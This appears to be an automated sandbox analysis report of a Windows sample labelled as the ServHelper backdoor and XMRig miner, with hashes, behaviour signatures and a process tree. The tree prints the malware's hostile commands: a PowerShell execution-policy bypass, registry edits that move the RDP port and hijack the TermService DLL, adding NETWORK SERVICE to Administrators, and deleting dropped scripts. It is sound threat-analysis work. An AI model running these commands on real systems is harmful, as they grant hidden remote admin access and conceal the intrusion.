Analysis
-
max time kernel
116s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
26-09-2021 15:03
General
-
Target
748b112881047820f530c202bb59488e.exe
-
Size
4.0MB
-
MD5
748b112881047820f530c202bb59488e
-
SHA1
edf77f969bf54a47b21e6179cbcabb4651706d7c
-
SHA256
82285ac0988c68f9b9ecc7649cb9c6a3f3ecb242dd198465dbd4236d7fa6a59c
-
SHA512
252640d935ce3c7885fa48496b1b9c405f5dc9e719eda9c965d5fec46f877c00a7d96b14acf7410fbef9dbbfa9723932b54cdc75084fdd54e492eaa8d6f37ad6
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Windows directory 8 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 63 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\748b112881047820f530c202bb59488e.exe"C:\Users\Admin\AppData\Local\Temp\748b112881047820f530c202bb59488e.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wgsr5gx1\wgsr5gx1.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2CB.tmp" "c:\Users\Admin\AppData\Local\Temp\wgsr5gx1\CSC25A62393E6D843C397C3F863D8835D3E.TMP"4⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
f3068198b62b4b70404ec46694d632be
SHA17b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795
-
MD5
15d441756e8415b7ee2bf247b572aa20
SHA151eb1b89d61f023087718656d62a5e15d4ca8c5d
SHA256a2481e15d51bab275c0991ef3f4c4291a056dff9af8eda0fd83334997491cc35
SHA512dfd9061b8f5f909246118858c3e456267de99f808b29c0feae72db437282337cef57dadd4e7c8a4585e49dccfd59a2c784e6bfd198f5224fb4f07a386f3723d3
-
MD5
9cc8773f50008a3bce99c9d5e6cf4635
SHA1855d5ab66b3d0735e73008659c4a199d4492c8cb
SHA256d3c9d4a6db3fcee8b9af72fa8cc0b776264357a9f55498852a5e0792aed8603c
SHA512959ad4270b888ae45fd0ebc12fa2fbb3f695eb26012337dfdf136add2e1bcdcb470266c2fcdb747617dde5eaeb682cf8034f5b5907ff6f17c95135fb0d343d80
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
aeb477523fe13853ad37536a8e7e765f
SHA1cebc4d8a98c1fda175e3658f1390f206032320a1
SHA2564fdaf3a54355f6ca655a262f35d5195613cd375b65937b343484169e0bd844d7
SHA512b4748d6322545e34570b9a87b15cb99f1e06e481d6576367f942ca7409d9368fa7bb1cff38de491e83ad2caf64c5a211ccb4c44d55aea95908af1d5ab3b9f59c
-
MD5
54d51ab12903069c2df6c18a780d84c2
SHA1163cf39ab2ad3a9cc942f7848bc64ffd462d2350
SHA256579ab92cf58173e4f4bd7297de4f0194ee87c9096e85e7346a2a5aee03844c26
SHA5127167e7945c1b9371cacfa6a8f0481d79b4ec1544683f83a2fac52176bd2549d246ba7ff18d43f5b79993a8fb257af520d002720a59545614dd71ec9607148d29
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
d29b294fcd16202a617f47de773f2038
SHA1e68df0b544e5edc2f974b61749416b82c6685da6
SHA256f279b7c634c06923856c7a804e239254da2cccdeb0e9cc46705711cb20835639
SHA512c5c541bb418567f311e7fbeda3661de1523697b164b82aa5504c52bd74032a484a7db298334ef996fa8e141c725875fcdd75a17efe2ccfe77b9a9d07c3386d7c
-
Filesize
4KB
-
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4.0MB
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
204KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
Filesize
4KB
-
-
Filesize
4KB
-
Filesize
4KB
-